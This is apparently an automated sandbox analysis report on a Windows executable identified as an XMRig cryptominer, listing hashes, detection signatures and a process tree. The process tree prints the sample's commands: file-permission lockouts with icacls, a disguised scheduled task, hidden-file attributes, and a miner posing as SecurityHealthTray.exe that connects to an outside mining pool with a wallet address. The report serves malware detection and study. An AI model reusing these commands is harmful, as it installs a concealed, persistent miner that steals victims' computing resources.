Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13/09/2024, 07:33
Static task
static1
Behavioral task
behavioral1
Sample
ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe
-
Size
4.6MB
-
MD5
ddf6edbdb88c1fb6f8ce7e8285109710
-
SHA1
c04ddbdc2cdbc1925b7544c3718270672c01a807
-
SHA256
ec03f155bfdfa8c72f3bab882afe7b03d3d6898a8fb0a6a830c98d8ad39a348d
-
SHA512
fdc7f527e745759a42605e5f116fd0085477925408fdd3c54313abff1c2cbb53acfe86544835af8d5437864cb4887f7aa2348a98ecf9fa3f9f49868618334def
-
SSDEEP
98304:AVU6BHZRv4Meak0ZM0p2B6LwFKHXTjKzZXh5:+j9ZRQXn6cFSXT+z
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/memory/2700-0-0x00007FF6118D0000-0x00007FF6125CE000-memory.dmp xmrig behavioral2/memory/3644-13-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp xmrig behavioral2/memory/4444-19-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp xmrig behavioral2/memory/4764-25-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp xmrig behavioral2/memory/864-31-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp xmrig behavioral2/memory/3108-37-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation SecurityHealthTray.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation SecurityHealthTray.exe -
Executes dropped EXE 5 IoCs
pid Process 3644 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4764 SecurityHealthTray.exe 864 SecurityHealthTray.exe 3108 SecurityHealthTray.exe -
Modifies file permissions 1 TTPs 6 IoCs
pid Process 3516 icacls.exe 4196 icacls.exe 1144 icacls.exe 4716 icacls.exe 4252 icacls.exe 4416 icacls.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2180 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 2 IoCs
pid Process 3728 taskkill.exe 2368 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4980 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3644 SecurityHealthTray.exe 3644 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe 4444 SecurityHealthTray.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4764 SecurityHealthTray.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3728 taskkill.exe Token: SeDebugPrivilege 2368 taskkill.exe Token: SeLockMemoryPrivilege 4764 SecurityHealthTray.exe Token: SeLockMemoryPrivilege 4764 SecurityHealthTray.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 2700 wrote to memory of 1136 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 85 PID 2700 wrote to memory of 1136 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 85 PID 2700 wrote to memory of 860 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 87 PID 2700 wrote to memory of 860 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 87 PID 1136 wrote to memory of 4196 1136 cmd.exe 89 PID 1136 wrote to memory of 4196 1136 cmd.exe 89 PID 1136 wrote to memory of 1144 1136 cmd.exe 90 PID 1136 wrote to memory of 1144 1136 cmd.exe 90 PID 1136 wrote to memory of 4716 1136 cmd.exe 92 PID 1136 wrote to memory of 4716 1136 cmd.exe 92 PID 860 wrote to memory of 3728 860 cmd.exe 91 PID 860 wrote to memory of 3728 860 cmd.exe 91 PID 2700 wrote to memory of 2644 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 94 PID 2700 wrote to memory of 2644 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 94 PID 2700 wrote to memory of 3968 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 97 PID 2700 wrote to memory of 3968 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 97 PID 3968 wrote to memory of 2368 3968 cmd.exe 99 PID 3968 wrote to memory of 2368 3968 cmd.exe 99 PID 2700 wrote to memory of 4268 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 100 PID 2700 wrote to memory of 4268 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 100 PID 2700 wrote to memory of 4980 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 102 PID 2700 wrote to memory of 4980 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 102 PID 2700 wrote to memory of 2180 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 103 PID 2700 wrote to memory of 2180 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 103 PID 2700 wrote to memory of 4612 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 106 PID 2700 wrote to memory of 4612 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 106 PID 2700 wrote to memory of 3856 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 108 PID 2700 wrote to memory of 3856 2700 ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe 108 PID 2180 wrote to memory of 2676 2180 cmd.exe 110 PID 2180 wrote to memory of 2676 2180 cmd.exe 110 PID 3856 wrote to memory of 4252 3856 cmd.exe 111 PID 3856 wrote to memory of 4252 3856 cmd.exe 111 PID 2180 wrote to memory of 4548 2180 cmd.exe 112 PID 2180 wrote to memory of 4548 2180 cmd.exe 112 PID 3856 wrote to memory of 4416 3856 cmd.exe 113 PID 3856 wrote to memory of 4416 3856 cmd.exe 113 PID 3856 wrote to memory of 3516 3856 cmd.exe 114 PID 3856 wrote to memory of 3516 3856 cmd.exe 114 PID 2180 wrote to memory of 4696 2180 cmd.exe 115 PID 2180 wrote to memory of 4696 2180 cmd.exe 115 PID 3644 wrote to memory of 4444 3644 SecurityHealthTray.exe 123 PID 3644 wrote to memory of 4444 3644 SecurityHealthTray.exe 123 PID 4444 wrote to memory of 4764 4444 SecurityHealthTray.exe 124 PID 4444 wrote to memory of 4764 4444 SecurityHealthTray.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2676 attrib.exe 4548 attrib.exe 4696 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "admin:(R,REA,RA,RD)"2⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:4196
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-5-7:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:1144
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "admin:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM SecurityHealthTray.exe2⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthTray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c RMDIR /S /Q C:\ProgramData\SecurityEssentials2⤵PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM SecurityHealthTray.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthTray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c RMDIR /S /Q C:\ProgramData\SecurityEssentials2⤵PID:4268
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN Windows\x86_microsoft-windows-fsrm-common_31bf3256ad364e35_10.0.18372.1_none_3fed101f25aae892\MicrosoftSecurityEssentials /XML "C:\ProgramData\SecurityEssentials\task.xml"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials" & ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"& ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\system32\attrib.exeATTRIB +h +s +r "C:\ProgramData\SecurityEssentials"3⤵
- Views/modifies file attributes
PID:2676
-
-
C:\Windows\system32\attrib.exeATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"3⤵
- Views/modifies file attributes
PID:4548
-
-
C:\Windows\system32\attrib.exeATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"3⤵
- Views/modifies file attributes
PID:4696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c DEL /F /Q C:\ProgramData\SecurityEssentials\task.xml2⤵PID:4612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"2⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:4252
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:4416
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:3516
-
-
-
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exeC:\ProgramData\SecurityEssentials\SecurityHealthTray.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=10 -o pool.hashvault.pro:5555 -u 83GTGcroaPp62ba8bLofMeCvfswfuLyiS8vQv1Pq7gLU69pUo9jchLhJzXR6TSsDLsDoeWm6awZbPTRyumYopDxeScQVAsN -p x --rig-id={afdcdefbefe}2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=50 -o pool.hashvault.pro:5555 -u 83GTGcroaPp62ba8bLofMeCvfswfuLyiS8vQv1Pq7gLU69pUo9jchLhJzXR6TSsDLsDoeWm6awZbPTRyumYopDxeScQVAsN -p x --rig-id={afdcdefbefe}3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
-
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exeC:\ProgramData\SecurityEssentials\SecurityHealthTray.exe1⤵
- Executes dropped EXE
PID:864
-
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exeC:\ProgramData\SecurityEssentials\SecurityHealthTray.exe1⤵
- Executes dropped EXE
PID:3108
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD575d36f991d4b31e7403d029ef1090309
SHA11dc4298c779cd92fbb9acd581eb22cc673c8db0f
SHA256daf142a796681e4d72cbc457a06cd8e3ce78a523d512312a1305cc3b23b8a4d6
SHA51257ab436000a3b404d0f18f293a95a2c0b72d429309039315675dd5b48537ff5195bf7ab022d86b2fb7f0129c612fa4b3d90f1196d996a1ceac3f680f6c1599d3